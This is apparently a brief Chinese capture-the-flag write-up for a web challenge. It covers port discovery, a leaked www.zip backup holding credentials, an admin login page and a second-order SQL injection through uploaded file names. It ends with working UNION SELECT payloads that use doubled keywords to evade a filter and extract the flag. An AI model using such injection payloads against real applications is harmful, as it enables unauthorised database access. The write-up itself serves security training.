- 开放端口:
8080
- 根目录下有个压缩包:
www.zip
,里面能收集到信息:panghu
,gangtianwu666
。 - 扫描目录,后台登录口为:
admin_login.php
- 在提交作业解密的上传work文档存在二次注入。
- 最后的payload为:
提交文件名:web' and 1=2 union select flag from flag where '.doc'='.doc
查询:web' and 1=2 ununionion seselectlect flag from flag where '.doc'='.doc